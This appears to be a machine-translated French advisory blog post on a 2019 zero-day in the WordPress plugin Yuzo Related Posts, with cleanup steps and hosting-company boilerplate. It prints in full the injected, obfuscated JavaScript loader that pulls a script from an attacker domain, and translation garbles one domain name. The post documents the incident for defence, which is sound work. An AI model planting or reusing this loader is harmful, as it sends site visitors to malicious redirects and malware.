Yuzo Related Posts Vulnérabilité et exploitation 0day dans la nature. Vulnérabilité Wordpress du plugin de publication liée à Yuzo.

Il y a environ une heure, une page WordPress que nous gérons a commencé à rediriger vers des pages publicitaires/malware.

J'ai trouvé la source de la redirection, j'aimerais aider les autres personnes concernées et j'ai besoin d'aide pour trouver la vulnérabilité réelle et/ou un correctif.

La redirection se produit une fois le chargement du site terminé, je cherchais donc un extrait de code JavaScript sur la page et des redirections douteuses dans l'analyseur de réseau. Les redirections malveillantes évidentes étaient : bonjourfromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk.

J'ai pu localiser les redirections provenant de https://hellofromhony.org/counter qui est intégré via un extrait de code.

L'extrait a été intégré dans wp_options dans une entrée avec la clé 'yuzo_related_post_options' - plus spécifiquement intégrée dans l'option json 'yuzo_related_post_css_and_style' de l'option_value.

Cette option fait partie du plugin de publications associées Yuzō, qui a été interrompu il y a environ une semaine : https://wordpress.org/plugins/yuzo-related-post/

YUZO Related Posts vulnérabilités et correctifs

La suppression de ce plugin a immédiatement arrêté la redirection, je n'ai pas pu trouver d'autres traces de falsification du site.

Concrètement, il est bon de suivre les étapes suivantes pour sécuriser votre site :

- Supprimer / Désinstaller le plugin immédiatement.
- Dans votre base de données, accédez à wp_optionstable et recherchez la valeur yuzo_related_post_optionssupprimer cet enregistrement.
- Ne pas supprimer le tableau des visites wp_yuzoviews, cela n'affecte pas le problème.

L'extrait qui se trouvait dans option_value :

</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Un correctif rapide apparaît lors de la suppression du plug-in, je souhaite approfondir pour m'assurer qu'il n'y a pas d'accès à la base de données, au backend et à l'espace Web.

Si vous aussi vous êtes victime de cette attaque et n'êtes pas en mesure de résoudre ce problème par vous-même, veuillez demander notre aide via le service de Suppression des logiciels malveillants et des virus WordPress.

Mise à jour des articles liés à Yuzo bientôt

Comme communiqué par l'auteur du plugin, une mise à jour du plugin sera publiée sous peu bien que le plugin ait cessé il y a exactement quelques jours en mars 2019. Il ne reste plus qu'à effectuer les étapes ci-dessus et attendre la nouvelle version.

Articles connexes

INFORMATIONS

Managed Server Srl est un acteur italien leader dans la fourniture de solutions système GNU/Linux avancées orientées vers la haute performance. Avec un modèle d'abonnement peu coûteux et prévisible, nous garantissons que nos clients ont accès à des technologies avancées en matière d'hébergement, de serveurs dédiés et de services cloud. En plus de cela, nous proposons des conseils système sur les systèmes Linux et une maintenance spécialisée en SGBD, sécurité informatique, Cloud et bien plus encore. Nous nous distinguons par notre expertise dans l'hébergement de CMS Open Source de premier plan tels que WordPress, WooCommerce, Drupal, Prestashop, Joomla, OpenCart et Magento, soutenus par un service d'assistance et de conseil de haut niveau adapté aux administrations publiques, aux PME et à toutes tailles.

BLOG

Yuzo Related Posts Vulnérabilité et exploitation 0day dans la nature. Vulnérabilité WordPress du plugin de publication liée à Yuzo.

Informations sur l'auteur

Marco Marcoaldi

Qu'est-ce qu'on fait ?

Vous avez des doutes ? Vous ne savez pas par où commencer ? Contactez-nous !

Discute avec nous

0256569681

Contactez-nous en ligne

INFORMATIONS

Solutions & Services

Assistance système

Aide et utilitaire

Société

paiements